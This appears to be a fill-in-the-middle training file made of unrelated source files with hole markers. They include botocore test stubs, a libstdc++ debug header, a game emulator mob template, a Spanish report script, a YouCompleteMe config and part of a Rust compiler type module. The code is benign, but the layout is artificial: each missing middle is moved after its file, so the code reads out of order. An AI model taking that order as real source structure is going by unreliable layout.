delay the next API call after a failed check call. Default of 5 seconds. """ def __init__(self, min_successes=1, max_attempts=20, delay=5, delay_initial_poll=False): self.min_successes = min_successes self.max_attempts = max_attempts self.delay = delay self.delay_initial_poll = delay_initial_poll def wait(self, check, *args, **kwargs): """ Wait until the check succeeds the configured number of times :type check: callable :param check: A callable that returns True or False to indicate if the check succeeded or failed. :type args: list :param args: Any ordered arguments to be passed to the check. :type kwargs: dict :param kwargs: Any keyword arguments to be passed to the check. 
""" attempts = 0 successes = 0 if self.delay_initial_poll: time.sleep(self.delay) while attempts < self.max_attempts: attempts += 1 if check(*args, **kwargs): successes += 1 if successes >= self.min_successes: return else: time.sleep(self.delay) fail_msg = self._fail_message(attempts, successes) raise ConsistencyWaiterException(fail_msg) def _fail_message(self, attempts, successes): format_args = (attempts, successes) return 'Failed after %s attempts, only had %s successes' % format_args class StubbedSession(botocore.session.Session): def __init__(self, *args, **kwargs): super(StubbedSession, self).__init__(*args, **kwargs) self._cached_clients = {} self._client_stubs = {} def create_client(self, service_name, *args, **kwargs): if service_name not in self._cached_clients: client = self._create_stubbed_client(service_name, *args, **kwargs) self._cached_clients[service_name] = client return self._cached_clients[service_name] def _create_stubbed_client(self, service_name, *args, **kwargs): client = super(StubbedSession, self).create_client( service_name, *args, **kwargs) stubber = Stubber(client) self._client_stubs[service_name] = stubber return client def stub(self, service_name, *args, **kwargs): if service_name not in self._client_stubs: self.create_client(service_name, *args, **kwargs) return self._client_stubs[service_name] def activate_stubs(self): for stub in self._client_stubs.values(): stub.activate() def verify_stubs(self): for stub in self._client_stubs.values(): stub.assert_no_pending_responses()<|fim▁end|>
""" return binascii.hexlify(os.urandom(int(num_chars / 2))).decode('ascii')
<|file_name|>debug_store_hash_fn_imps.hpp<|end_file_name|><|fim▁begin|>// -*- C++ -*-<|fim▁hole|>// software; you can redistribute it and/or modify it under the terms // of the GNU General Public License as published by the Free Software // Foundation; either version 3, or (at your option) any later // version. // This library is distributed in the hope that it will be useful, but // WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU // General Public License for more details. // Under Section 7 of GPL version 3, you are granted additional // permissions described in the GCC Runtime Library Exception, version // 3.1, as published by the Free Software Foundation. // You should have received a copy of the GNU General Public License and // a copy of the GCC Runtime Library Exception along with this program; // see the files COPYING3 and COPYING.RUNTIME respectively. If not, see // <http://www.gnu.org/licenses/>. // Copyright (C) 2004 Ami Tavory and Vladimir Dreizin, IBM-HRL. // Permission to use, copy, modify, sell, and distribute this software // is hereby granted without fee, provided that the above copyright // notice appears in all copies, and that both that copyright notice // and this permission notice appear in supporting documentation. None // of the above authors, nor IBM Haifa Research Laboratories, make any // representation about the suitability of this software for any // purpose. It is provided "as is" without express or implied // warranty. /** * @file cc_hash_table_map_/debug_store_hash_fn_imps.hpp * Contains implementations of cc_ht_map_'s debug-mode functions. */ #ifdef _GLIBCXX_DEBUG PB_DS_CLASS_T_DEC void PB_DS_CLASS_C_DEC:: assert_entry_pointer_valid(const entry_pointer p_e, true_type, const char* __file, int __line) const { debug_base::check_key_exists(PB_DS_V2F(p_e->m_value), __file, __line); comp_hash pos_hash_pair = ranged_hash_fn_base::operator()(PB_DS_V2F(p_e->m_value)); PB_DS_DEBUG_VERIFY(p_e->m_hash == pos_hash_pair.second); } #endif<|fim▁end|>
// Copyright (C) 2005-2015 Free Software Foundation, Inc. // // This file is part of the GNU ISO C++ Library. This library is free
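# The C++ record above re-derives an entry's hash in debug builds and asserts
# it matches the cached per-entry value. The same invariant check as a minimal
# Python sketch (all names hypothetical):
def assert_entry_hash_valid(entry, hash_fn):
    # A mismatch means the key mutated after its hash was stored.
    assert entry['stored_hash'] == hash_fn(entry['key'])

assert_entry_hash_valid({'key': 'k1', 'stored_hash': hash('k1')}, hash)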
<|file_name|>water_thief.py<|end_file_name|><|fim▁begin|>import sys from services.spawn import MobileTemplate from services.spawn import WeaponTemplate from resources.datatables import WeaponType from resources.datatables import Difficulty from resources.datatables import Options from java.util import Vector def addTemplate(core): mobileTemplate = MobileTemplate() mobileTemplate.setCreatureName('water_thief') mobileTemplate.setLevel(5) mobileTemplate.setDifficulty(Difficulty.NORMAL) mobileTemplate.setMinSpawnDistance(4) mobileTemplate.setMaxSpawnDistance(8) mobileTemplate.setDeathblow(False)<|fim▁hole|> mobileTemplate.setScale(1) mobileTemplate.setSocialGroup("thug") mobileTemplate.setAssistRange(4) mobileTemplate.setStalker(True) mobileTemplate.setOptionsBitmask(Options.AGGRESSIVE | Options.ATTACKABLE) templates = Vector() templates.add('object/mobile/shared_dressed_tatooine_moisture_thief.iff') mobileTemplate.setTemplates(templates) weaponTemplates = Vector() weapontemplate = WeaponTemplate('object/weapon/melee/sword/shared_sword_01.iff', WeaponType.ONEHANDEDMELEE, 1.0, 5, 'kinetic') weaponTemplates.add(weapontemplate) mobileTemplate.setWeaponTemplateVector(weaponTemplates) attacks = Vector() mobileTemplate.setDefaultAttack('saberhit') mobileTemplate.setAttacks(attacks) core.spawnService.addMobileTemplate('water_thief', mobileTemplate) return<|fim▁end|>
<|file_name|>get-propuestas-electorales-v5.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # -*- coding: utf-8 -*- ''' This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License version 3 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.txt>. ''' import sys sys.path.append('../shared') import functions as f import ape, operator def main(): d_output = ape.format_results('results.json') crlf = '\r\n' output = [] s = '=======================================' for item in sorted(d_output.iteritems(), key = operator.itemgetter(0)): d_item = item[1] f.append(output, s + crlf + 'Propuestas tarea - ' + item[0] + (' (' + d_item['task_id'] + ')') + crlf + s) f.append(output, d_item['breadcrumbs']) f.append(output, d_item['pages'] + crlf + '------------------') answers = d_item['answers'] for answer in answers: <|fim▁hole|> answer = answer[0] + ' (' + answer[1] + ')' else: answer = '(' + str(answer) + ')' f.append(output, 'Propuestas analista ' + answer + crlf + '---------------------------------------') f.append(output, 'Hora de inicio: ' + f.formatTime(answers[answ]['answer_end_date']) + crlf + 'Hora de fin: ' + f.formatTime(answers[answ]['answer_start_date'])) for item in answers[answ]['answer'].split('\n'): if item.replace(' ', '') != '': f.append(output, item + crlf + '----------') f.write_file('propuestas.txt', str(crlf * 2).join(output)) if __name__ == '__main__': main()<|fim▁end|>
answ = answer if 'desconocido' in answer: answer = answer.split('_')
<|file_name|>.ycm_extra_conf.py<|end_file_name|><|fim▁begin|># Generated by YCM Generator at 2019-06-21 11:57:11.711058 # This file is NOT licensed under the GPLv3, which is the license for the rest # of YouCompleteMe. # # Here's the license text for this file: # # This is free and unencumbered software released into the public domain. # # Anyone is free to copy, modify, publish, use, compile, sell, or # distribute this software, either in source code form or as a compiled # binary, for any purpose, commercial or non-commercial, and by any # means. # # In jurisdictions that recognize copyright laws, the author or authors # of this software dedicate any and all copyright interest in the # software to the public domain. We make this dedication for the benefit # of the public at large and to the detriment of our heirs and # successors. We intend this dedication to be an overt act of # relinquishment in perpetuity of all present and future rights to this # software under copyright law. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. # # For more information, please refer to <http://unlicense.org/> import os import ycm_core flags = [ '-x', 'c++', '-I../../utils/', ] # Set this to the absolute path to the folder (NOT the file!) containing the # compile_commands.json file to use that instead of 'flags'. See here for # more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html # # You can get CMake to generate this file for you by adding: # set( CMAKE_EXPORT_COMPILE_COMMANDS 1 ) # to your CMakeLists.txt file. # # Most projects will NOT need to set this to anything; you can just change the # 'flags' list of compilation flags. Notice that YCM itself uses that approach.<|fim▁hole|>compilation_database_folder = '' if os.path.exists( compilation_database_folder ): database = ycm_core.CompilationDatabase( compilation_database_folder ) else: database = None SOURCE_EXTENSIONS = [ '.C', '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ] def DirectoryOfThisScript(): return os.path.dirname( os.path.abspath( __file__ ) ) def MakeRelativePathsInFlagsAbsolute( flags, working_directory ): if not working_directory: return list( flags ) new_flags = [] make_next_absolute = False path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ] for flag in flags: new_flag = flag if make_next_absolute: make_next_absolute = False if not flag.startswith( '/' ): new_flag = os.path.join( working_directory, flag ) for path_flag in path_flags: if flag == path_flag: make_next_absolute = True break if flag.startswith( path_flag ): path = flag[ len( path_flag ): ] new_flag = path_flag + os.path.join( working_directory, path ) break if new_flag: new_flags.append( new_flag ) return new_flags def IsHeaderFile( filename ): extension = os.path.splitext( filename )[ 1 ] return extension in [ '.H', '.h', '.hxx', '.hpp', '.hh' ] def GetCompilationInfoForFile( filename ): # The compilation_commands.json file generated by CMake does not have entries # for header files. So we do our best by asking the db for flags for a # corresponding source file, if any. If one exists, the flags for that file # should be good enough. 
if IsHeaderFile( filename ): basename = os.path.splitext( filename )[ 0 ] for extension in SOURCE_EXTENSIONS: replacement_file = basename + extension if os.path.exists( replacement_file ): compilation_info = database.GetCompilationInfoForFile( replacement_file ) if compilation_info.compiler_flags_: return compilation_info return None return database.GetCompilationInfoForFile( filename ) def FlagsForFile( filename, **kwargs ): if database: # Bear in mind that compilation_info.compiler_flags_ does NOT return a # python list, but a "list-like" StringVec object compilation_info = GetCompilationInfoForFile( filename ) if not compilation_info: return None final_flags = MakeRelativePathsInFlagsAbsolute( compilation_info.compiler_flags_, compilation_info.compiler_working_dir_ ) else: relative_to = DirectoryOfThisScript() final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to ) return { 'flags': final_flags, 'do_cache': True }<|fim▁end|>
<|file_name|>ty.rs<|end_file_name|><|fim▁begin|>// Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. #![allow(non_camel_case_types)] use back::svh::Svh; use driver::session::Session; use metadata::csearch; use middle::const_eval; use middle::lang_items::{ExchangeHeapLangItem, OpaqueStructLangItem}; use middle::lang_items::{TyDescStructLangItem, TyVisitorTraitLangItem}; use middle::freevars; use middle::resolve; use middle::resolve_lifetime; use middle::ty; use middle::subst::Subst; use middle::typeck; use middle::typeck::{MethodCall, MethodCallee, MethodMap}; use middle::ty_fold; use middle::ty_fold::TypeFolder; use middle; use util::ppaux::{note_and_explain_region, bound_region_ptr_to_str}; use util::ppaux::{trait_store_to_str, ty_to_str, vstore_to_str}; use util::ppaux::{Repr, UserString}; use util::common::{indenter}; use util::nodemap::{NodeMap, NodeSet, DefIdMap, DefIdSet, FnvHashMap}; use std::cast; use std::cell::{Cell, RefCell}; use std::cmp; use std::fmt::Show; use std::fmt; use std::hash::{Hash, sip}; use std::ops; use std::rc::Rc; use collections::{HashMap, HashSet}; use syntax::ast::*; use syntax::ast_util::{is_local, lit_is_str}; use syntax::ast_util; use syntax::attr; use syntax::attr::AttrMetaMethods; use syntax::codemap::Span; use syntax::parse::token; use syntax::parse::token::InternedString; use syntax::{ast, ast_map}; use syntax::owned_slice::OwnedSlice; use syntax::abi::AbiSet; use syntax; use collections::enum_set::{EnumSet, CLike}; pub type Disr = u64; pub static INITIAL_DISCRIMINANT_VALUE: Disr = 0; // Data types #[deriving(Eq, TotalEq, Hash)] pub struct field { ident: ast::Ident, mt: mt } #[deriving(Clone)] pub enum MethodContainer { TraitContainer(ast::DefId), ImplContainer(ast::DefId), } #[deriving(Clone)] pub struct Method { ident: ast::Ident, generics: ty::Generics, fty: BareFnTy, explicit_self: ast::ExplicitSelf_, vis: ast::Visibility, def_id: ast::DefId, container: MethodContainer, // If this method is provided, we need to know where it came from provided_source: Option<ast::DefId> } impl Method { pub fn new(ident: ast::Ident, generics: ty::Generics, fty: BareFnTy, explicit_self: ast::ExplicitSelf_, vis: ast::Visibility, def_id: ast::DefId, container: MethodContainer, provided_source: Option<ast::DefId>) -> Method { Method { ident: ident, generics: generics, fty: fty, explicit_self: explicit_self, vis: vis, def_id: def_id, container: container, provided_source: provided_source } } pub fn container_id(&self) -> ast::DefId { match self.container { TraitContainer(id) => id, ImplContainer(id) => id, } } } pub struct Impl { did: DefId, ident: Ident, methods: Vec<@Method> } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct mt { ty: t, mutbl: ast::Mutability, } #[deriving(Clone, Eq, TotalEq, Encodable, Decodable, Hash, Show)] pub enum vstore { vstore_fixed(uint), vstore_uniq, vstore_slice(Region) } #[deriving(Clone, Eq, TotalEq, Hash, Encodable, Decodable, Show)] pub enum TraitStore { UniqTraitStore, // ~Trait RegionTraitStore(Region), // &Trait } pub struct field_ty { name: Name, id: DefId, vis: ast::Visibility, } // Contains information needed to resolve 
types and (in the future) look up // the types of AST nodes. #[deriving(Eq, TotalEq, Hash)] pub struct creader_cache_key { cnum: CrateNum, pos: uint, len: uint } pub type creader_cache = RefCell<HashMap<creader_cache_key, t>>; pub struct intern_key { sty: *sty, } // NB: Do not replace this with #[deriving(Eq)]. The automatically-derived // implementation will not recurse through sty and you will get stack // exhaustion. impl cmp::Eq for intern_key { fn eq(&self, other: &intern_key) -> bool { unsafe { *self.sty == *other.sty } } fn ne(&self, other: &intern_key) -> bool { !self.eq(other) } } impl TotalEq for intern_key {} impl<W:Writer> Hash<W> for intern_key { fn hash(&self, s: &mut W) { unsafe { (*self.sty).hash(s) } } } pub enum ast_ty_to_ty_cache_entry { atttce_unresolved, /* not resolved yet */ atttce_resolved(t) /* resolved to a type, irrespective of region */ } #[deriving(Clone, Eq, Decodable, Encodable)] pub struct ItemVariances { self_param: Option<Variance>, type_params: OwnedSlice<Variance>, region_params: OwnedSlice<Variance> } #[deriving(Clone, Eq, Decodable, Encodable, Show)] pub enum Variance { Covariant, // T<A> <: T<B> iff A <: B -- e.g., function return type Invariant, // T<A> <: T<B> iff B == A -- e.g., type of mutable cell Contravariant, // T<A> <: T<B> iff B <: A -- e.g., function param type Bivariant, // T<A> <: T<B> -- e.g., unused type parameter } pub enum AutoAdjustment { AutoAddEnv(ty::Region, ast::Sigil), AutoDerefRef(AutoDerefRef), AutoObject(ast::Sigil, Option<ty::Region>, ast::Mutability, ty::BuiltinBounds, ast::DefId, /* Trait ID */ ty::substs /* Trait substitutions */) } #[deriving(Decodable, Encodable)] pub struct AutoDerefRef { autoderefs: uint, autoref: Option<AutoRef> } #[deriving(Decodable, Encodable, Eq, Show)] pub enum AutoRef { /// Convert from T to &T AutoPtr(Region, ast::Mutability), /// Convert from ~[]/&[] to &[] (or str) AutoBorrowVec(Region, ast::Mutability), /// Convert from ~[]/&[] to &&[] (or str) AutoBorrowVecRef(Region, ast::Mutability), /// Convert from @fn()/~fn()/|| to || AutoBorrowFn(Region), /// Convert from T to *T AutoUnsafe(ast::Mutability), /// Convert from ~Trait/&Trait to &Trait AutoBorrowObj(Region, ast::Mutability), } /// The data structure to keep track of all the information that typechecker /// generates so that so that it can be reused and doesn't have to be redone /// later on. pub struct ctxt { // Specifically use a speedy hash algorithm for this hash map, it's used // quite often. interner: RefCell<FnvHashMap<intern_key, ~t_box_>>, next_id: Cell<uint>, sess: Session, def_map: resolve::DefMap, named_region_map: resolve_lifetime::NamedRegionMap, region_maps: middle::region::RegionMaps, // Stores the types for various nodes in the AST. Note that this table // is not guaranteed to be populated until after typeck. See // typeck::check::fn_ctxt for details. node_types: node_type_table, // Stores the type parameters which were substituted to obtain the type // of this node. This only applies to nodes that refer to entities // parameterized by type parameters, such as generic fns, types, or // other items. 
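    // E.g. for a hypothetical call `foo::<int>()`, the substituted parameter
    // list `[int]` is recorded here against the path expression's node id.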
node_type_substs: RefCell<NodeMap<Vec<t>>>, // Maps from a method to the method "descriptor" methods: RefCell<DefIdMap<@Method>>, // Maps from a trait def-id to a list of the def-ids of its methods trait_method_def_ids: RefCell<DefIdMap<@Vec<DefId> >>, // A cache for the trait_methods() routine trait_methods_cache: RefCell<DefIdMap<@Vec<@Method> >>, impl_trait_cache: RefCell<DefIdMap<Option<@ty::TraitRef>>>, trait_refs: RefCell<NodeMap<@TraitRef>>, trait_defs: RefCell<DefIdMap<@TraitDef>>, map: ast_map::Map, intrinsic_defs: RefCell<DefIdMap<t>>, freevars: RefCell<freevars::freevar_map>, tcache: type_cache, rcache: creader_cache, short_names_cache: RefCell<HashMap<t, ~str>>, needs_unwind_cleanup_cache: RefCell<HashMap<t, bool>>, tc_cache: RefCell<HashMap<uint, TypeContents>>, ast_ty_to_ty_cache: RefCell<NodeMap<ast_ty_to_ty_cache_entry>>, enum_var_cache: RefCell<DefIdMap<@Vec<@VariantInfo> >>, ty_param_defs: RefCell<NodeMap<TypeParameterDef>>, adjustments: RefCell<NodeMap<@AutoAdjustment>>, normalized_cache: RefCell<HashMap<t, t>>, lang_items: @middle::lang_items::LanguageItems, // A mapping of fake provided method def_ids to the default implementation provided_method_sources: RefCell<DefIdMap<ast::DefId>>, supertraits: RefCell<DefIdMap<@Vec<@TraitRef> >>, // Maps from def-id of a type or region parameter to its // (inferred) variance. item_variance_map: RefCell<DefIdMap<@ItemVariances>>, // A mapping from the def ID of an enum or struct type to the def ID // of the method that implements its destructor. If the type is not // present in this map, it does not have a destructor. This map is // populated during the coherence phase of typechecking. destructor_for_type: RefCell<DefIdMap<ast::DefId>>, // A method will be in this list if and only if it is a destructor. destructors: RefCell<DefIdSet>, // Maps a trait onto a list of impls of that trait. trait_impls: RefCell<DefIdMap<@RefCell<Vec<@Impl> >>>, // Maps a def_id of a type to a list of its inherent impls. // Contains implementations of methods that are inherent to a type. // Methods in these implementations don't need to be exported. inherent_impls: RefCell<DefIdMap<@RefCell<Vec<@Impl> >>>, // Maps a def_id of an impl to an Impl structure. // Note that this contains all of the impls that we know about, // including ones in other crates. It's not clear that this is the best // way to do it. impls: RefCell<DefIdMap<@Impl>>, // Set of used unsafe nodes (functions or blocks). Unsafe nodes not // present in this set can be warned about. used_unsafe: RefCell<NodeSet>, // Set of nodes which mark locals as mutable which end up getting used at // some point. Local variable definitions not in this set can be warned // about. used_mut_nodes: RefCell<NodeSet>, // vtable resolution information for impl declarations impl_vtables: typeck::impl_vtable_map, // The set of external nominal types whose implementations have been read. // This is used for lazy resolution of methods. populated_external_types: RefCell<DefIdSet>, // The set of external traits whose implementations have been read. This // is used for lazy resolution of traits. populated_external_traits: RefCell<DefIdSet>, // Borrows upvar_borrow_map: RefCell<UpvarBorrowMap>, // These two caches are used by const_eval when decoding external statics // and variants that are found. 
extern_const_statics: RefCell<DefIdMap<Option<@ast::Expr>>>, extern_const_variants: RefCell<DefIdMap<Option<@ast::Expr>>>, } pub enum tbox_flag { has_params = 1, has_self = 2, needs_infer = 4, has_regions = 8, has_ty_err = 16, has_ty_bot = 32, // a meta-flag: subst may be required if the type has parameters, a self // type, or references bound regions needs_subst = 1 | 2 | 8 } pub type t_box = &'static t_box_; pub struct t_box_ { sty: sty, id: uint, flags: uint, } // To reduce refcounting cost, we're representing types as unsafe pointers // throughout the compiler. These are simply casted t_box values. Use ty::get // to cast them back to a box. (Without the cast, compiler performance suffers // ~15%.) This does mean that a t value relies on the ctxt to keep its box // alive, and using ty::get is unsafe when the ctxt is no longer alive. enum t_opaque {} #[allow(raw_pointer_deriving)] #[deriving(Clone, Eq, TotalEq, Hash)] pub struct t { priv inner: *t_opaque } impl fmt::Show for t { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { f.buf.write_str("*t_opaque") } } pub fn get(t: t) -> t_box { unsafe { let t2: t_box = cast::transmute(t); t2 } } pub fn tbox_has_flag(tb: t_box, flag: tbox_flag) -> bool { (tb.flags & (flag as uint)) != 0u } pub fn type_has_params(t: t) -> bool { tbox_has_flag(get(t), has_params) } pub fn type_has_self(t: t) -> bool { tbox_has_flag(get(t), has_self) } pub fn type_needs_infer(t: t) -> bool { tbox_has_flag(get(t), needs_infer) } pub fn type_has_regions(t: t) -> bool { tbox_has_flag(get(t), has_regions) } pub fn type_id(t: t) -> uint { get(t).id } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct BareFnTy { purity: ast::Purity, abis: AbiSet, sig: FnSig } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct ClosureTy { purity: ast::Purity, sigil: ast::Sigil, onceness: ast::Onceness, region: Region, bounds: BuiltinBounds, sig: FnSig, } /** * Signature of a function type, which I have arbitrarily * decided to use to refer to the input/output types. * * - `binder_id` is the node id where this fn type appeared; * it is used to identify all the bound regions appearing * in the input/output types that are bound by this fn type * (vs some enclosing or enclosed fn type) * - `inputs` is the list of arguments and their modes. * - `output` is the return type. * - `variadic` indicates whether this is a varidic function. (only true for foreign fns) */ #[deriving(Clone, Eq, TotalEq, Hash)] pub struct FnSig { binder_id: ast::NodeId, inputs: Vec<t>, output: t, variadic: bool } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct param_ty { idx: uint, def_id: DefId } /// Representation of regions: #[deriving(Clone, Eq, TotalEq, Hash, Encodable, Decodable, Show)] pub enum Region { // Region bound in a type or fn declaration which will be // substituted 'early' -- that is, at the same time when type // parameters are substituted. ReEarlyBound(/* param id */ ast::NodeId, /*index*/ uint, ast::Name), // Region bound in a function scope, which will be substituted when the // function is called. The first argument must be the `binder_id` of // some enclosing function signature. ReLateBound(/* binder_id */ ast::NodeId, BoundRegion), /// When checking a function body, the types of all arguments and so forth /// that refer to bound region parameters are modified to refer to free /// region parameters. ReFree(FreeRegion), /// A concrete region naming some expression within the current function. ReScope(NodeId), /// Static data that has an "infinite" lifetime. Top in the region lattice. 
ReStatic, /// A region variable. Should not exist after typeck. ReInfer(InferRegion), /// Empty lifetime is for data that is never accessed. /// Bottom in the region lattice. We treat ReEmpty somewhat /// specially; at least right now, we do not generate instances of /// it during the GLB computations, but rather /// generate an error instead. This is to improve error messages. /// The only way to get an instance of ReEmpty is to have a region /// variable with no constraints. ReEmpty, } /** * Upvars do not get their own node-id. Instead, we use the pair of * the original var id (that is, the root variable that is referenced * by the upvar) and the id of the closure expression. */ #[deriving(Clone, Eq, TotalEq, Hash)] pub struct UpvarId { var_id: ast::NodeId, closure_expr_id: ast::NodeId, } #[deriving(Clone, Eq, TotalEq, Hash)] pub enum BorrowKind { /// Data must be immutable and is aliasable. ImmBorrow, /// Data must be immutable but not aliasable. This kind of borrow /// cannot currently be expressed by the user and is used only in /// implicit closure bindings. It is needed when you the closure /// is borrowing or mutating a mutable referent, e.g.: /// /// let x: &mut int = ...; /// let y = || *x += 5; /// /// If we were to try to translate this closure into a more explicit /// form, we'd encounter an error with the code as written: /// /// struct Env { x: & &mut int } /// let x: &mut int = ...; /// let y = (&mut Env { &x }, fn_ptr); // Closure is pair of env and fn /// fn fn_ptr(env: &mut Env) { **env.x += 5; } /// /// This is then illegal because you cannot mutate a `&mut` found /// in an aliasable location. To solve, you'd have to translate with /// an `&mut` borrow: /// /// struct Env { x: & &mut int } /// let x: &mut int = ...; /// let y = (&mut Env { &mut x }, fn_ptr); // changed from &x to &mut x /// fn fn_ptr(env: &mut Env) { **env.x += 5; } /// /// Now the assignment to `**env.x` is legal, but creating a /// mutable pointer to `x` is not because `x` is not mutable. We /// could fix this by declaring `x` as `let mut x`. This is ok in /// user code, if awkward, but extra weird for closures, since the /// borrow is hidden. /// /// So we introduce a "unique imm" borrow -- the referent is /// immutable, but not aliasable. This solves the problem. For /// simplicity, we don't give users the way to express this /// borrow, it's just used when translating closures. UniqueImmBorrow, /// Data is mutable and not aliasable. MutBorrow } /** * Information describing the borrowing of an upvar. This is computed * during `typeck`, specifically by `regionck`. The general idea is * that the compiler analyses treat closures like: * * let closure: &'e fn() = || { * x = 1; // upvar x is assigned to * use(y); // upvar y is read * foo(&z); // upvar z is borrowed immutably * }; * * as if they were "desugared" to something loosely like: * * struct Vars<'x,'y,'z> { x: &'x mut int, * y: &'y const int, * z: &'z int } * let closure: &'e fn() = { * fn f(env: &Vars) { * *env.x = 1; * use(*env.y); * foo(env.z); * } * let env: &'e mut Vars<'x,'y,'z> = &mut Vars { x: &'x mut x, * y: &'y const y, * z: &'z z }; * (env, f) * }; * * This is basically what happens at runtime. The closure is basically * an existentially quantified version of the `(env, f)` pair. * * This data structure indicates the region and mutability of a single * one of the `x...z` borrows. 
* * It may not be obvious why each borrowed variable gets its own * lifetime (in the desugared version of the example, these are indicated * by the lifetime parameters `'x`, `'y`, and `'z` in the `Vars` definition). * Each such lifetime must encompass the lifetime `'e` of the closure itself, * but need not be identical to it. The reason that this makes sense: * * - Callers are only permitted to invoke the closure, and hence to * use the pointers, within the lifetime `'e`, so clearly `'e` must * be a sublifetime of `'x...'z`. * - The closure creator knows which upvars were borrowed by the closure * and thus `x...z` will be reserved for `'x...'z` respectively. * - Through mutation, the borrowed upvars can actually escape * the closure, so sometimes it is necessary for them to be larger * than the closure lifetime itself. */ #[deriving(Eq, Clone)] pub struct UpvarBorrow { kind: BorrowKind, region: ty::Region, } pub type UpvarBorrowMap = HashMap<UpvarId, UpvarBorrow>; impl Region { pub fn is_bound(&self) -> bool { match self { &ty::ReEarlyBound(..) => true, &ty::ReLateBound(..) => true, _ => false } } } #[deriving(Clone, Eq, Ord, TotalEq, TotalOrd, Hash, Encodable, Decodable, Show)] pub struct FreeRegion { scope_id: NodeId, bound_region: BoundRegion } #[deriving(Clone, Eq, Ord, TotalEq, TotalOrd, Hash, Encodable, Decodable, Show)] pub enum BoundRegion { /// An anonymous region parameter for a given fn (&T) BrAnon(uint), /// Named region parameters for functions (a in &'a T) /// /// The def-id is needed to distinguish free regions in /// the event of shadowing. BrNamed(ast::DefId, ast::Name), /// Fresh bound identifiers created during GLB computations. BrFresh(uint), } /** * Represents the values to use when substituting lifetime parameters. * If the value is `ErasedRegions`, then this subst is occurring during * trans, and all region parameters will be replaced with `ty::ReStatic`. */ #[deriving(Clone, Eq, TotalEq, Hash)] pub enum RegionSubsts { ErasedRegions, NonerasedRegions(OwnedSlice<ty::Region>) } /** * The type substs represents the kinds of things that can be substituted to * convert a polytype into a monotype. Note however that substituting bound * regions other than `self` is done through a different mechanism: * * - `tps` represents the type parameters in scope. They are indexed * according to the order in which they were declared. * * - `self_r` indicates the region parameter `self` that is present on nominal * types (enums, structs) declared as having a region parameter. `self_r` * should always be none for types that are not region-parameterized and * Some(_) for types that are. The only bound region parameter that should * appear within a region-parameterized type is `self`. * * - `self_ty` is the type to which `self` should be remapped, if any. The * `self` type is rather funny in that it can only appear on traits and is * always substituted away to the implementing type for a trait. */ #[deriving(Clone, Eq, TotalEq, Hash)] pub struct substs { self_ty: Option<ty::t>, tps: Vec<t>, regions: RegionSubsts, } mod primitives { use super::t_box_; use syntax::ast; macro_rules! 
def_prim_ty( ($name:ident, $sty:expr, $id:expr) => ( pub static $name: t_box_ = t_box_ { sty: $sty, id: $id, flags: 0, }; ) ) def_prim_ty!(TY_NIL, super::ty_nil, 0) def_prim_ty!(TY_BOOL, super::ty_bool, 1) def_prim_ty!(TY_CHAR, super::ty_char, 2) def_prim_ty!(TY_INT, super::ty_int(ast::TyI), 3) def_prim_ty!(TY_I8, super::ty_int(ast::TyI8), 4) def_prim_ty!(TY_I16, super::ty_int(ast::TyI16), 5) def_prim_ty!(TY_I32, super::ty_int(ast::TyI32), 6) def_prim_ty!(TY_I64, super::ty_int(ast::TyI64), 7) def_prim_ty!(TY_UINT, super::ty_uint(ast::TyU), 8) def_prim_ty!(TY_U8, super::ty_uint(ast::TyU8), 9) def_prim_ty!(TY_U16, super::ty_uint(ast::TyU16), 10) def_prim_ty!(TY_U32, super::ty_uint(ast::TyU32), 11) def_prim_ty!(TY_U64, super::ty_uint(ast::TyU64), 12) def_prim_ty!(TY_F32, super::ty_float(ast::TyF32), 14) def_prim_ty!(TY_F64, super::ty_float(ast::TyF64), 15) pub static TY_BOT: t_box_ = t_box_ { sty: super::ty_bot, id: 16, flags: super::has_ty_bot as uint, }; pub static TY_ERR: t_box_ = t_box_ { sty: super::ty_err, id: 17, flags: super::has_ty_err as uint, }; pub static LAST_PRIMITIVE_ID: uint = 18; } // NB: If you change this, you'll probably want to change the corresponding // AST structure in libsyntax/ast.rs as well. #[deriving(Clone, Eq, TotalEq, Hash)] pub enum sty { ty_nil, ty_bot, ty_bool, ty_char, ty_int(ast::IntTy), ty_uint(ast::UintTy), ty_float(ast::FloatTy), ty_str(vstore), ty_enum(DefId, substs), ty_box(t), ty_uniq(t), ty_vec(mt, vstore), ty_ptr(mt), ty_rptr(Region, mt), ty_bare_fn(BareFnTy), ty_closure(~ClosureTy), ty_trait(~TyTrait), ty_struct(DefId, substs), ty_tup(Vec<t>), ty_param(param_ty), // type parameter ty_self(DefId), /* special, implicit `self` type parameter; * def_id is the id of the trait */ ty_infer(InferTy), // something used only during inference/typeck ty_err, // Also only used during inference/typeck, to represent // the type of an erroneous expression (helps cut down // on non-useful type error messages) // "Fake" types, used for 